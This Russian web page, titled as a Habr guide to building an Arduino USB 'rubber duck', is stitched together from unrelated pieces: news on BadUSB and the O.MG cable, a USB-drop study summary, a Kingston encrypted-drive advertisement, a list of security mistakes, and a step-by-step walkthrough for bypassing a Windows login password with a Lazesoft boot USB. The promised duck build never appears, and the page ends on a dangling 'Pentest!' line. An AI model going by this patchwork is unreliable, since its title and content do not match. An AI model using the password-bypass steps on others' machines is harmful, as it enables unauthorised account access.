Нажмите "Enter", чтобы перейти к содержанию

Флешка для взлома: Взлом компьютера за 3 секунды. Делаем USB-уточку с нуля на Arduino / Хабр

Содержание

USB-флешки можно превратить в необнаружимые устройства для осуществления взломов

USB-флешки можно превратить в необнаружимые устройства для осуществления взломов

Alexander Antipov

Исследователи, опубликовавшие PoC-код BadUSB, утверждают, что безопасность USB-устройств полностью скомпрометирована.

Независимые исследователи Брендон Уилсон (Brandon Wilson) и Адам Кодилл (Adam Caudill) опубликовали PoC-код для перепрограммирования USB-флешек и использования их в качестве необнаружимых инструментов для совершения взломов. Код был опубликован на Github в целях детального освещения вопроса безопасности USB-устройств. SecurityLab.ru уже  сообщал об этом.

В интьервью изданию Security Affairs эксперты объяснили, что USB-устройства могут быть использованы для компрометации персональных компьютеров и осуществления новых видов кибератак.

В настоящее время ни один антивирусный продукт не способен обнаружить и устранить такую угрозу. Уилсон и Кодилл  опубликовали PoC-код для того, чтобы производители USB-устройств приняли меры по устранению уязвимости.

Как сообщил Брендон Уилсон, безопасность USB-устройств полностью скомпрометирована. Любой девайс, подключаемый к ПК, может быть использован для осуществления кибератак. Исследователь говорит, что ранее USB-устройство представляло собой перепрограммируемый компьютер, благодаря чему его можно было использовать абсолютно в любых целях. В настоящее время производители ограничивают возможности USB-девайсов, четко прописывая их функции и поведение в прошивках.

После конференции Black Hat Уилсон приобрел ряд USB-флешек и использовал существующие программные инструменты, чтобы встроить собственный код в их прошивку. На Derby Con исследователи продемонстрировали результаты своей работы – USB-клавиатуру, которая при подключении к ПК жертвы выполняла определенный скрипт.

По словам Уилсона, компьютеры неспособны отличить подлинное USB-устройство от девайса с измененной прошивкой. Таким образом, любое устройство можно использовать для взлома ПК жертв.

Для того чтобы защитить девайсы от компрометации, разработчикам следует улучшить уровень их безопасности. Уилсон предлагает использовать код с цифровой подписью для того, чтобы третья сторона не могла изменить прошивку устройства.


В США летающие микрочипы следят за людьми и вирусами, троян GriftHorse заразил 10 млн Android-гаджетов, а новый робот Amazon оказался настоящим кошмаром. А также еженедельные конкурсы с крутыми призами на нашем ютуб канале!
Поделиться новостью:

Легкий способ сбросить пароль на Windows 10, 8, 7, XP

Лучший способ удалить пароль пользователя Windows

По многочисленным просьбам читателей решил написать подробную и простую инструкцию, как сбросить пароль от учетной записи пользователя в любой версии Windows: 10, 8. 1, 8, 7, XP.

Итак, вы включили компьютер, а система просит ввести пароль для входа. Вы вводите пароль пользователя, а он не подходит: возникает ошибка “неверный пароль”. Что же делать, если ни один пароль не подходит, а войти в систему необходимо? Есть решение – пароль можно сбросить с помощью специальной программы, записанной на загрузочную флешку. Сейчас расскажу, как создать такую флешку.

Вам будет необходимо ненадолго воспользоваться любым другим компьютером. Для этого можете обратиться к родственнику, другу, соседу, может есть компьютер на работе – думаю, это сейчас не проблема.

Итак, садимся за другой компьютер или ноутбук. Вставляем в него любую флешку:

Скачиваем бесплатную программу для сброса паролей Windows – Lazesoft Recover My Password. Можете скачать ее с официального сайта (либо с моего Яндекс.Диска):

Запустите скаченный файл lsrmphdsetup.exe:Устанавливаем программу как обычно: т. е. со всем соглашаемся и во всех окнах жмем кнопку “Next”. В последнем окне установки жмем кнопку “Finish” – программа запустится автоматически и на рабочем столе будет создан ее ярлык:

В стартовом окне жмем кнопку Burn Bootable CD/USB Disk Now! (“Записать загрузочный CD/USB диск прямо сейчас”):

В следующем окне выберите версию Windows, которая установлена на том компьютере где мы будем затем сбрасывать пароль. В списке нет

Windows 10, но это не страшно: если у вас “десятка”, то выбирайте здесь Windows 8.1 с вашей разрядностью.

Кстати, на одном из форумов я видел сообщение, что можно создать загрузочную флешку с Windows 8.1 64-bit, и она подойдет для сброса пароля на любой версии Windows (я проверил на Windows 10 64-bit и на Windows 7 64-bit – так и есть):

После того, как выбрали нужную версию Windows – жмем кнопку “Next”:

В следующем окне ставим маркер на пункте USB Flash и выбираем букву нашей флешки (она уже вставлена в компьютер). В моем случае буква флешки: F.
Затем жмем кнопку “Start”:

Программа некоторое время будет загружать необходимые компоненты с сайта Microsoft:

После этого программа спросит: “Отформатировать USB диск сейчас?

” Все файлы, если они есть на флешке – будут удалены. Жмем кнопку “Yes”:

Теперь ждем, пока будет создана загрузочная флешка:



По окончанию процесса – жмем кнопку “Finish”:

Всё! Загрузочная флешка с программой для сброса пароля готова. Вынимаем ее и несем на свой компьютер.

Вставляем загрузочную флешку в свой компьютер. И вот теперь наступает самый важный, и в то же время самый сложный для тех кто будет делать это впервые, момент. Нам нужно настроить загрузку компьютера с нашей флешки.

Те, кто умеет загружать компьютер с флешки – можете сразу переходить к концу данной статьи. Для тех, кто не знает как загрузиться с флешки, постараюсь объяснить как можно понятней:

============================================================================================

Для того, чтобы “заставить” компьютер загрузиться не как обычно (т.

е. с жесткого диска), а с нужного нам устройства (в нашем случае – с флешки) – необходимо включить определенную настройку в Биосе компьютера.

Чтобы попасть в этот самый Биос, мы должны сразу же после включения компьютера нажать определенную клавишу на клавиатуре (и нажать не один раз, а много-много раз, пока не увидим Биос на экране).

На разных компьютерах и ноутбуках эта клавиша разная:

  • Чаще всего используется клавиша Delete (или Del).
  • Также часто Биос можно вызвать клавишей F2 (а на некоторых ноутбуках Fn+F2).
  • Реже используются клавиши Esc, F1, F6 и другие.

В общем, сразу же после того как вы нажали кнопку включения (Power) на своем компьютере или ноутбуке, то не ждите пока начнется загрузка Windows, а сразу начинайте жать много раз на клавишу

Delete на клавиатуре. Через несколько секунд (5-10) на экране должен появиться Биос.

Если ничего такого не появилось, а началась как обычно загрузка вашей Windows, то ничего больше не ждем: снова перезагружаем наш компьютер (можно прямо кнопкой Reset) и пробуем жать много раз уже другую клавишу – F2.

Если опять не попали в Биос – перезагружаем компьютер снова и пробуем жать следующую клавишу – Esc. Потом F6 и т.д. Но надеюсь, вам не придется так долго экспериментировать: в подавляющем большинстве случаев срабатывает либо клавиша Delete, либо F2.

Кстати, подсказка о том, какой клавишей загрузить Биос обычно мелькает внизу на экране сразу же после включения компьютера. Но почему-то никто на нее не смотрит, либо не успевает рассмотреть.

Итак, надеюсь, пока понятно. Будем считать, что в Биос мы попали.

На разных компьютерах Биос разный, и выглядит он у всех по разному.

У меня на компьютере он, например, такой:

На другом компьютере он будет такой:

На третьем компьютере такой:


То есть это я говорю к тому, что написать отдельную инструкцию к каждому Биосу практически нереально.

Главное, что должен знать любой, кому необходимо настроить загрузку с флешки: в Биосе (как бы он у вас не выглядел) нужно найти раздел, где присутствует слово Boot (с англ. “Загрузка”). Перейдя с помощью стрелок на клавиатуре в этот раздел – выставляем на первое место в списке загрузочных устройств флешку.

В Биосе флешка может отображаться с собственным названием (например, Transcend), либо как

USB-HDD; бывают и другие варианты. Важно одно: ее необходимо выбрать в качестве первого устройства, с которого пойдет загрузка компьютера.

Обычно флешку “поднимают” на первое место с помощью стрелок на клавиатуре, либо клавишами +/- , либо F5/F6.

Выставив в Биосе нужную нам настройку, мы должны покинуть его, не забыв сохранить внесенные изменения. Для этого нужно перейти в раздел Exit (он обычно самый последний) – и там выбрать пункт “Save and Exit” (“Сохранить и Выйти”). И затем еще раз подтвердить, что мы выходим, нажав “Yes”.

На этом всё: если вы сделали все правильно, компьютер перезагрузится и загрузка пойдет уже с флешки (жать снова клавишу Delete, либо F2, либо еще что-то – не надо!).

Многие не хотят даже связываться с созданием загрузочной флешки с любым софтом, т.к. боятся что все равно не смогут настроить с нее загрузку компьютера. Я постарался описать весь этот процесс загрузки с флешки как можно подробнее. Если вы осилили этот текст, надеюсь стало хоть немного понятнее и теперь остается только попрактиковаться.

Дальше я буду рассказывать, как сбросить пароль Windows на примере своего компьютера.

===============================================================================================================

Итак, я создал на другом компьютере загрузочную флешку с программой для сброса пароля Lazesoft Recover My Password. Эту флешку я вставляю в свой компьютер и включаю его.

Сразу же жму много-много раз клавишу Delete на клавиатуре. Через несколько секунд попадаю в Биос.

Перехожу с помощью стрелок на клавиатуре в раздел Boot (хотя в моем Биосе можно и мышкой работать – в старых версиях Биоса так не получится).

Здесь у меня первым устройством сейчас стоит жесткий диск (ACHI PO: WDC WD50…):


Выделяю эту строчку с помощью стрелки на клавиатуре и жму клавишу Enter. Открывается список устройств, с которых можно загрузиться. В моем случае это жесткий диск и моя флешка (она здесь перечислена аж два раза). Поднимаем на первое место в списке – флешку (если есть выбор: USB или UEFI, то выбираем UEFI). Делаем это с помощью стрелок на клавиатуре, либо клавишами +/- , либо F5/F6:

Теперь флешка на первом месте в списке загрузочных устройств:

Теперь выходим отсюда, сохранив изменения. Для этого перемещаемся стрелкой на клавиатуре в последний раздел Exit. Выделяем строчку Save Changes and Exit – жмем клавишу Enter:

Затем выбираем Yes:

Компьютер сам перезагрузится. Дальше я ничего не трогаю – жду когда начнется загрузка компьютера с моей загрузочной флешки.

Через некоторое время открывается меню, в котором клавишей Enter мы выбираем пункт Lazesoft Live CD:


Ждем пока идет загрузка:

В следующем окне проверяем чтобы был выбран пункт Reset Windows Password (“Сброс пароля Windows”) и жмем кнопку Next:

Выскочит окошко с сообщением о некоммерческом использовании программы – жмем Yes:

Снова жмем Next:

В следующем окне выделяем имя пользователя, пароль которого будет сброшен и жмем Next:

Жмем на кнопку RESET/UNLOCK:

Пароль успешно сброшен – жмем ОК. Затем Finish:

Заходим в “Пуск” и жмем Reboot Computer (“Перезагрузить компьютер”):

Нажимаем ОК:

После того, как компьютер перезагрузится, мы сможем войти в Windows без пароля!

Метки: BIOS, usb, пароль, учетная запись, флешка

Хакеры могут взломать смартфон через кабель для зарядки

O.MG — это специальный провод, замаскированный под стандартный кабель Lightning от компании Apple. С помощью данного устройства хакер может удаленно контролировать клавиатуру гаджета и получить доступ к пользовательским данным. При этом в опасности находятся не только владельцы iPhone, но и любители Android-устройств. Как еще можно взломать смартфон через кабель для зарядки — выясняла «Газета.Ru».

Хакеры могут без особого труда взломать iPhone через кабель O.MG, который является точной копией Lightning, сообщает Forbes.

Впервые о взломе смартфона через провод для зарядки стало известно еще в 2019 году. Тогда СМИ писали о том, что пользователям не стоит использовать общественные провода для зарядки, так как они могут быть подключены к компьютеру, через который хакер получит пользовательские данные.

Однако теперь история получила новый поворот, так как атакующим устройством стал сам O.MG кабель. С его помощью хакер может не только взломать iPhone, но и другие устройства Apple.

Дело в том, что в кабель встроен мини-роутер, который позволяет создавать точку доступа Wi-Fi, подключаясь к которой хакер может управлять шнуром через браузер. Кроме того, когда O.MG подключен к смартфону, он буквально «запоминает» последовательность нажатий. Когда владелец не использует свой смартфон, то хакер может самостоятельно использовать клавиатуру смартфона, собирая тем самым пользовательские данные.

Опасный кабель был разработан изобретателем Майком Гровером. Гровер выбрал кабель Lightning, поскольку он был самым сложным, маленьким и плотно сидел в гнезде. Однако позже внешний вид O.MG был изменен, и теперь под угрозой находится не только «яблочная» техника, но и Android-устройства.

При этом Гровер отмечает, что создал устройство не для того, чтобы в дальнейшем продавать такие кабели хакерам. Он лишь хотел предупредить о том, что подобную вещь может сделать любой человек, обладающий минимальным набором технических знаний.

«Идея создания такого рода устройств довольно проста — устройство класса USB HID (Human Interface Device — класс устройств USB для взаимодействия с человеком), встраивается в любое известное нам периферийное USB-устройство. Поскольку USB — по-настоящему универсальный интерфейс, злоумышленник может сделать из него, например, флешку или кабель, который, при подключении к компьютеру, будет восприниматься им как любое другое периферийное устройство. В данном случае USB-кабель был использован в качестве клавиатуры с Wi-Fi интерфейсом, одновременно функционирующим как точка доступа Wi-Fi. Поэтому, подключаясь к такому устройству, клавиатуру можно контролировать удаленно и вводить все, что угодно злоумышленнику», — рассказал ведущий исследователь киберугроз в Avast Мартин Хрон.

Тем не менее, по словам эксперта, особенность этого нового кабеля заключается в том, что он поддерживает сразу несколько функций, позволяющих отслеживать нажатия клавиш, автоматически запускать заранее загруженное ПО и даже определять местоположение при включении или отключении.

«Тот факт, что вся «дополнительная» электроника помещается в крошечный кабель USB-C — это действительно впечатляет, особенно учитывая то, что он изготовил кабель своими руками в домашних условиях. Кроме того, этот случай доказывает, что современные инструменты и развитый рынок производства на заказ позволяют создать все, что угодно», — предупреждает эксперт.

Также Хрон отметил, что опасность таких устройств заключается в том, что пользователь даже не догадывается, что устройство может содержать вредоносный функционал.

«В данном конкретном случае возможность вводить или регистрировать нажатия клавиш при удаленном управлении (я видел, как подобное устройство управляется не только через Wi-Fi, но и через сотовую сеть), делает его весьма опасным инструментом в руках киберпреступников. При этом ни в периметре сети, ни в сетевом трафике нельзя заметить ничего подозрительного. Гипотетически злоумышленники смогут удаленно получать данные жертвы или заставлять ее ПК открывать определенные сайты», — заключил специалист.

Тема с кражей данных через «вредоносный USB-кабель» или «нехорошую зарядку» не новая: для этого есть разные схемы и устройства, причем речь идет не только об атаках на смартфоны, но и на ПК, отмечает эксперт по кибербезопасности в «Лаборатории Касперского» Дмитрий Галов.

В теории возможна и другая ситуация, когда пользователь подключается «хорошим проводом» к неправильной зарядке, говорит эксперт. Дело в том, что человек, когда подключается к неизвестной зарядке в общественном месте, например, в торговом центре, не знает, что за оборудование находится за тем или иным USB-портом. И если это оказывается не обычный блок питания, а микрокомпьютер, то последствия могут быть самыми разными. Например, c некоторых моделей смартфонов, подключенных по USB к компьютеру, можно считать входящие SMS или отправить сообщение.

Если подключить к такой «злой зарядной станции» разблокированный смартфон, то злоумышленники могут, например, увидеть содержимое карты памяти или защищённого хранилища, где могут быть конфиденциальные данные. В некоторых случаях злоумышленники могут даже заразить устройство вредоносным софтом, сообщил собеседник «Газеты.Ru».

Защита информации на флешке | Как защитить файлы на USB-флешке

Совместное исследование университетов и Иллинойса и Мичигана показало: 48% людей подключают к компьютеру случайно найденные флeшки. Мы перевели основные тезисы и выводы, которые показывают, почему важно учитывать поведение пользователей для защиты информации.

При посещении любой конференции по безопасности, вы неизбежно услышите, как «белые» хакеры хвастаются, что могут взломать систему безопасности любой компании, разбросав флешек с вредоносным кодом на парковке этой компании. Эта история является настолько популярной, что была экранизирована в шестом эпизоде сериала Mr Robot. Невольно на ум приходят мысли – подобная атака на самом деле работает или это просто миф?

Для того, чтобы протестировать данную атаку, исследователи разбросали около 300 флешек на территории Иллинойского Университета в городе Шампейн-Урбана и подсчитали сколько человек подсоединили их к компьютерам. Оказалось, что пользователи поднимали, подсоединяли и кликали по файлам 48% флешек разбросанных нами. Причем делали они это быстро: первую флешку подняли менее чем через 6 минут.

Эксперимент

Для проверки того, действительно ли пользователи поднимают флешки, найденные на земле, ученые разбросали пять типов флешек на территории Иллинойского Университета: флешки с наклейкой «экзамены» или «конфиденциально», флешки с прицепленными к ним ключами, флешки с ключами и наклейкой с обратным адресом, а также обычные флешки без каких-либо наклеек.

На каждую флешку записали файлы, соответствующие наклейке на флешке:

  • личные файлы для флешек без наклеек, флешек с ключами и флешек с наклейкой с обратным адресом;
  • файлы, относящиеся к бизнесу, для на флешек с наклейкой «конфиденциально»;
  • файлы с информацией по экзаменам для флешек с надписью «экзамены».

Все файлы на самом деле являлись HTML-файлами со встроенным изображением с нашего сервера. Это позволило исследователям без выполнения какого-либо кода на компьютере пользователя обнаружить, была ли подсоединена флешка и был ли открыт файл. Как только пользователь открывал HTML-файл, появлялся вопрос: не желает ли пользователь принять участие в исследовании, ответив на вопрос, почему он подсоединил флешку, и получить за это подарочную карту. 62 пользователя (около 20%) согласились дать ответ.

«Вброс» зараженных флешек очень эффективен для взлома компьютера

Итак, насколько же эффективно разбрасывать USB-флешки со зловредным кодом с целью взлома компьютеров? Как оказалось, очень эффективно: 48% разбросанных флешек пользователи не только подсоединили к компьютеру, но и открыли по крайней мере один файл на каждой из них. Удивительно высокая степень результативности доказывает факт, что атаки путем разбрасывания флешек являются реальной угрозой, и подчеркивает необходимость обучения и информирования пользователей об опасности подсоединения непроверенных флешек.

Разбрасывание флешек с вредоносным кодом приносит плоды очень быстро

Кроме того, что многие люди подсоединяют USB-флешки, делают это они очень быстро. 20% подсоединенных флешек были подсоединены в течение первого часа, а 50% флешек – в течение 7 часов, как видно из графика ниже.

Это означает, что промежуток времени на то, чтобы обнаружить атаку, очень мал. В данном случае, первые сообщения о наличии странных флешек на территории университета начали появляться на Reddit  примерно через сутки после первой волны, однако это не остановило людей в их стремлении подсоединять подсадные USB-флешки.

Определенное значение имеет то, как выглядит флешка

Как видно на диаграмме ниже, флешки с наклейками, вызывающими любопытство, чаще открывают, чем флешки без каких-либо отличительной маркировки. Что удивительно, наибольший результат дает прикрепление физических ключей – альтруистическое поведение является наиболее частой причиной просмотра флешек. Ключи с контактными данными владельца открывали реже всего по причине наличия способа найти владельца. Обратите внимание на то, что разница в частоте открывания НЕ является статистически значимой, кроме того, что флешки с обратным адресом подсоединялись менее часто.

Местоположение для открытия зараженной флешки значения не имеет

Как видно из графика ниже, частота открытия для каждого местоположения примерно одинакова. Это подтверждает тот факт, что хакеру не нужно проникать на территорию жертвы, чтобы провести атаку эффективно. Размещение флешки на парковке так же эффективно, как и в защищенном конференц-зале.

Каждый уязвим к атакам через случайно найденную флешку

Каждый является уязвимым к атаке через найденную флешку: исследователи не обнаружили разницы между демографическими данными, информированностью о правилах безопасности и образованием пользователей, которые подсоединяли флешки.

Почему в исследовании не наблюдается отрицательной корреляции между образованностью по части информационной безопасности и уязвимостью, думайте сами. Но неизбежно возникает вопрос об эффективности обучения информационной безопасности. Предмет, по всей видимости, стоит изучить тщательнее, чтобы обучение информационной безопасности действительно помогало людям быть более защищенными.

Мотивация пользователей

Мотивация в ответах пользователей: на вопрос почему подсоединили флешку, большинство опрошенных ответили, что сделали это из альтруистических побуждений с целью возврата флешки владельцу (68%). Как видно из диаграммы ниже, только 18% сказали, что ими двигало любопытство.

Наблюдаемая мотивация: как видно из диаграммы ниже, мотивация в ответах пользователей не соответствуют тому, какие файлы были открыты. Например, в отношении флешек, с прикрепленными физическими ключами, пользователи чаще кликали по фото с зимнего отпуска, чем по резюме, в котором можно было бы найти контактную информацию владельца. Примечательно, что такое же поведение наблюдалось в отношении флешек с обратным адресом, но не в отношении флешек без маркировки.

Результаты данного исследования показывают, что безопасность USB является реальной проблемой, а разбрасывание USB-флешек – дешевый и практичный инструмент для хакерской атаки.

ПОПРОБУЙТЕ «СЁРЧИНФОРМ КИБ»!

Полнофункциональное ПО без ограничений по пользователям и функциональности.

Последний яркий пример взлома USB без шифрования

В данном случае дело в том, что лондонский аэропорт Хитроу (30 октября 2017 г.) использует USB-накопители без шифрования для хранения данных не в облаке. К сожалению, у них не принято в качестве стандарта использовать USB-накопители с шифрованием. Неприменение ими надлежащих стандартов по обеспечению безопасности данных / защите от потери данных путем использования USB-накопителей с шифрованием обошлось ЕС крупным нарушением конфиденциальности секретной и служебной информации.

Лондон – USB-накопитель без шифрования выдавал «конфиденциальные» файлы / файлы «для служебного пользования»:

  • Накопитель содержал 76 папок / 174 документа
  • Подробные сведения о мерах, используемых для защиты Королевы
  • Файлы раскрывали типы идентификаторов, необходимых для проникновения в зоны ограниченного доступа
  • Расписание патрулей безопасности
  • Карты, указывающие места установки камер телевизионной системы наблюдения
  • В одном документе освещались недавние терростические акты и говорилось о типе угрозы, с которой может столкнуться аэропорт

Подобные потери данных из USB-накопителя случаются чаще, чем можно было бы думать и ожидать, и являются яркими примерами того, почему реализация стандарта / политики применения USB с шифрованием должна иметь наивысший приоритет, это должно войти в привычку как лично для вас, так и, что еще важнее, для вашей организации. Подробнее

Воспользуйтесь преимуществами линейки USB-накопителей с шифрованием компании Kingston, включая знаменитые решения IronKey, охватывающие все коммерческие и государственные потребности и требования. Подробнее

Что важно?

Все еще сохраняются давние разногласия по поводу человеческого фактора / внутренней угрозы, куда входят проблемы низких стандартов и политик, наряду с отсутствием подотчетности и ответственности. Данные, персональная идентифицируемая информация и конфиденциальная информация остаются ключевыми элементами, нуждающимися в нашей самой основательной защите.

USB с шифрованием, самое надежное необлачное хранилище!

Недавние взломы, внешние воздействия и поставленные под угрозу основные фонды — все это ясно показало, что большая часть инцидентов проистекает из предотвратимых ошибок, которым мы позволили произойти. В большинстве случаев виновниками инцидентов были простые недосмотры по причинам, начиная с невнимательности и спешки и заканчивая отсутствием надлежащих стандартов, политик и процедур.

Это затрагивает безопасность, охрану и защиту информации о гражданах / сотрудниках, начиная с личных данных и заканчивая медицинской и финансовой информацией. Кроме того, необходимость защитить конфиденциальную корпоративную информацию, стратегии государственной безопасности и обороны и разведывательные данные.

Хотите, чтобы это попало в завтрашние заголовки?

Нормативные акты 2018 года: Избежать громадных штрафов и судебных процессов из-за несоответствия нормативам

Как EU GDPR (Регламент защиты персональных данных Европейского Союза), так и NYDFS — 23 NYCRR 500 (Департамент финансовых услуг штата Нью-Йорк — Нормативы по кибербезопасности 23 NYCRR, Часть 500) предусматривают шифрование данных:

  • Стандарты по безопасности обработки данных
    • Организации должны шифровать данные как при передаче, так и при хранении.
  • EU GDPR: Шифрование персональных данных» (Статья 32, Безопасность обработки)
  • NYDFS: Организации должны шифровать данные как при передаче, так и при хранении. (Раздел 500.15 Шифрование внутренней информации.)

3 важнейших вещи

Облачное хранилище / Необлачное хранилище

Как мы знаем, облако является великолепным решением, но уверены ли вы в некоторых вещах?

  • Постоянный доступ – Всегда ли у вас будет доступ к Интернету?
  • Надежный / защищенный доступ – Можете ли вы доверять “свободному” WiFi при входе в систему?
  • Следующая кибер-атака – Вы пострадали от вредоносного ПО / программ-вымогателей?

Имея USB-накопитель с шифрованием (WiFi или нет) вы можете быть уверены, что ваши данные защищены, доступны и в случае их утери никто не получит доступа к зашифрованным файлам.

Дополнение существующей безопасности оконечной точки на уровне устройства технологией Data Loss Prevention (DLP) — Защита от утечек конфиденциальной информации.

USB-накопители Kingston / IronKey с шифрованием являются идеальным решением для предотвращения отключения всех USB-портов. Последнее, что вам нужно — это намеренно создать неэффективную или непроизводительную мобильную рабочую силу.

Безопасность оконечной точки может предоставить множество преимуществ при использовании в политиках пользовательских или групповых профилей.

  • Определите, кто должен или не должен иметь доступа к USB-порту
  • Примите решение о стандартном USB-накопителе с шифрованием от компании Kingston
  • Фиксация определенной модели USB-накопителя — только один этот USB-накопитель будет работать
  • Блокировка любого другого подключаемого устройства – только выданный компанией usb-накопитель с шифрованием
  • Разрешение или запрещение файлов, которые могут быть перенесены на usb-накопитель с шифрованием
  • Контроль переносимых файлов и времени последнего использования накопителя

Ликвидация угроз и снижение рисков

Ассортимент семейства USB-накопителей компании Kingston, в том числе, хорошо известные решения IronKey, обеспечивает несколько уровней обеспечения безопасности, защиту данных и функции управления рисками.

  • 100% соответствующий требованиям USB-накопитель с защитой шифрованием
  • Аппаратное 256-битное AES шифрование в режиме XTS
  • «Сертифицировано» FIPS 197 и FIPS 140-2 Уровня 3

Имеются решения для управления

Мгновенное получение полного и подробнейшего контроля над всеми своими USB-накопителями с шифрованием

  • ПО Safeconsole — DTVP 3.0 и DT4000G2 Managed
  • IronKey EMS — IronKey D300 Managed и IronKey S1000 Enterprise

Подробнее

Инфографика по EU GDPR и степени необходимости шифрования

Глобальный регламент по защите зашифрованных данных:

Нормы общей защиты данных ЕС (EU General Data Protection Regulation, EU GDPR) вступают в силу в мае 2018 г.

Applies to every organization that processes personal data of EU citizens, will take full effect in May 2018. Organizations to implement and ensure a level of security appropriate to the risk, including…encryption of personal data» (Article 32, Security of processing)
Подробнее

Департамент финансовых услуг штата Нью-Йорк (NYDFS — 23 NYCRR 500) Новые требования вступают в силу в феврале 2018 г.

Applies to every organization in New York that processes corporate / personal data. The proposal calls for organizations to encrypt sensitive data both in-transit and at-rest. (Section 500.15 Encryption of Nonpublic Information.)
Подробнее

Узнайте больше о USB-накопителе с шифрованием — Kingston Technology

USB-накопители с шифрованием

IronKey

Как защитить компьютер от взлома и хакеров?

По данным лаборатории AV-TEST, ежедневно обнаруживается более 390 000 новых вредоносных программ. Такое количество вредоносных программ дает хакерам практически неограниченные возможности в выборе цели.

Пользователи часто совершают один и те же распространенные ошибки, которые злоумышленники с удовольствием используют.

Ниже приведен краткий обзор 10 основных ошибок пользователей и способы их предотвращения для обеспечения безопасности вашей сети.

1) Переход по сомнительным ссылкам

Как отмечает Inc., пользователи часто попадаются на удочку «странных» сайтов через виртуальное «сарафанное радио», при скачивании музыки или просмотре бесплатных фотографий.

Нажав на сомнительную ссылку, вы можете запустить в свою систему вредоносное ПО, которое затем предоставит злоумышленникам доступ к вашей личной информации, включая банковские счета и номера кредитных карт.

Чтобы не подвергаться риску, старайтесь заходить на сайты с хорошей репутацией. Как правило, наиболее безопасные ссылки отображаются в верху списка результатов любого поискового запроса Google, но если вы все-таки сомневаетесь, не нажимайте на ссылку.

2) Использование неизвестных флэш-накопителей

Важно создавать резервные копии файлов и вашей системы, но всегда будьте осторожны, когда вставляете чужую флешку или USB-накопитель в свой компьютер.

Внешние диски могут содержать вредоносные программы, и одного такого удачно «забытого» диска хватит для того, чтобы заразить всю сеть.

Вывод: если это не ваше устройство, не используйте его. Регулярно проверяйте свое устройство на наличие вирусов и других вредоносных программ, чтобы убедиться, что вы не заражаете другие машины.

3) Скачивание фальшивого антивирусного ПО

Каждый из вас сталкивался с всплывающими предупреждениями о том, что ваш компьютер окажется под угрозой, если вы немедленно не скачаете бесплатное антивирусное ПО.

Злоумышленники мастерски умеют убедить пользователя скачать файлы прежде чем он поймет, что происходит: их любимый трюк — выдать вредоносный код за программу проверки компьютера на вирусы, что непременно «поможет» пользователю защититься от онлайн-угроз.

Однако один клик мыши по этой ссылке может заблокировать использование на компьютере легитимных защитных решений. Всегда следите за своевременным обновлением вашего антивирусного ПО с интегрированным блокировщиком всплывающих окон, который предотвратит появление на экране небезопасных ссылок.

4) Атаки через веб-камеру

Как пишет Daily Mail, взлом веб-камеры может привести к вмешательству в вашу частную жизнь с серьезными последствиями. Определенный тип вредоносного ПО предоставляет злоумышленникам удаленный доступ к вашему компьютеру и возможность включения веб-камеры.

Камера вашего компьютера не защищена так, как другие подключенные к сети устройства, поэтому основным признаком того, что ваша она включена и, возможно, ведется запись, — это горящий LED-индикатор.

Недостаточно просто заклеить камеру скотчем: звук он не блокирует. Поэтому убедитесь, что вы знаете, как отключить камеру.

5) Использование одного пароля для разных сайтов при отсутствии двухфакторной аутентификации

Если вы используете одинаковый пароль для входа в свои аккаунты на сайтах интернет-магазинов, банков и государственных организаций, вы – находка для хакера. Эта так называемая «гирляндная цепочка» позволяет им получить доступ ко всем вашим учетным записям, взломав лишь одну.

Используйте разные пароли для разных аккаунтов и меняйте их каждые шесть месяцев. Конечно, держать в памяти несколько разных паролей не просто, но это лучше, чем устранять последствия кражи личных данных, если преступник доберется до всех ваших учетных записей.

6) Использование слабых паролей

Даже если вы для разных учетных записей используете разные пароли, но они недостаточно сложны, вы рискуете стать жертвой хакеров, взламывающих пароли методом перебора, т.е. злоумышленник для проведения атаки на ваши аккаунты использует специальные программы подбора паролей. Чем короче и проще ваш пароль, тем быстрее хакер его взломает.

7) Несвоевременное обновление программного обеспечения

Несвоевременная установка необходимых обновлений (для таких программ, как Windows, Java, Flash и Office) – это ошибка, которая играет на руку киберпреступникам, предоставляя им возможность получить доступ к вашему компьютеру.

Даже надежное антивирусное решение может оказаться бессильным, если в популярном ПО имеются уязвимости. Например, как пишет V3, недавно Microsoft выпустила исправление MS15-081 для некоторых уязвимостей в Office.

Если вы вовремя не устанавливаете обновления, вы не получаете новые патчи и тем самым оставляете в своей системе лазейку, которую злоумышленники могут использовать для атаки и кражи ваших данных.

8) Ответы на фишинговые письма

Как сообщается на сайте канадского правительства Get Cyber Safe, 80,000 пользователей ежедневно становятся жертвами фишингового мошенничества.

В следующий раз, когда вы получите фишинговое сообщение, в котором говорится, что вы выиграли в лотерею, или что вам нужно «кликнуть сюда», чтобы избежать штрафов за неуплату налогов или посмотреть «шокирующее видео», немедленно удалите его.

В большинстве систем электронной почты есть спам-фильтры, которые блокируют подобные сообщения, но все же прежде чем нажать на ссылку в сообщении, проверьте отправителя (и не только имя, но и адрес электронной почты) и убедитесь, что это доверенный контакт.

9) Отключение функций управления учетными записями пользователей

Уведомления от Контроля учетных записей пользователей (компонент операционной системы Windows) могут надоедать пользователю, и он решит, что самый простой способ избавиться от них — отключить.

Однако эти уведомления важны, поскольку сообщают пользователю об изменениях, происходящих на его компьютере, что позволяет ему управлять обновлениями.

Если вы отключите уведомления, вы фактически дадите хакерам карт-бланш: теперь они смогут без вашего разрешения вносить изменения в ваш компьютер и, следовательно, получат доступ к вашим файлам.

10) Использование публичных Wi-Fi сетей

Никогда не используйте публичные Wi-Fi сети для доступа к вашей личной информации. Эти сети часто небезопасны, и, что еще хуже, они могут оказаться ловушкой. Плохие парни знают: заглянув в кафе на чашку кофе, пользователи ожидают увидеть в нем табличку с названием локальной сети «Coffeshop WiFi».

Поэтому злоумышленники создают там заманчивую (но вредоносную) точку доступа для всех желающих выйти в Интернет. И как только вы подключаетесь к сети, хакер получает возможность завладеть вашим паролям и другим личным данным.

Хотите оплатить счета или проверить свою налоговую декларацию? Сделайте это из дома, где вы можете быть уверены в безопасности вашей сети.

Бонус! Короткие ссылки

Длинные ссылки, которые не очень удобно для использования в Facebook или Twitter, часто сокращаются до нескольких символов, что делает URL-адрес сайта невидимым.

Проход по такой ссылке может завести вас на неизвестный сайт, содержащий вредоносную программу. Чтобы избежать этой ловушки, используйте браузер с предварительным просмотром ссылок, показывающий название и описание веб-страницы, а также его иконку, чтобы вы заранее знали, куда ведет эта ссылка.

Если ссылка кажется вам подозрительной, не нажимайте на нее. Пользователи все время совершают ошибки, ставящие под угрозу безопасность компьютера, и хакеры с удовольствием пользуются этим! Но знание — это сила: зная методы «работы» злоумышленников, не давайте им возможности получить доступ к вашей личной информации, файлам или данным.

Статьи и ссылки по теме:

Продукты:

Как защитить Wi-Fi от взлома

фото 2

фото 4

фото 6

фото 8

фото 10

Pentest !
Что нам понадобится:
